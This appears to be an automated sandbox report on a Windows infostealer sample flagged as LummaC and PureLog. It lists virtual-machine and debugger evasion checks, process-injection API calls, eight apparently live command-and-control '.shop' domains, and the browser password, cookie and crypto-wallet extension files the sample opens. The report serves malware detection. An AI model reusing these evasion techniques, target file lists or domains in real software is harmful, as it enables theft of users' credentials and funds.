Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Memory allocated: AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 24F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 22C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 6756

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000002.00000002.1878693850.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878577989.0000000001180000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00442080 LdrInitializeThunk,

2_2_00442080

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_024F7F41 mov edi, dword ptr fs:[00000030h]		0_2_024F7F41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_024F80BE mov edi, dword ptr fs:[00000030h]		0_2_024F80BE

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_024F7F41 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_024F7F41

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.34f9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.34f9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
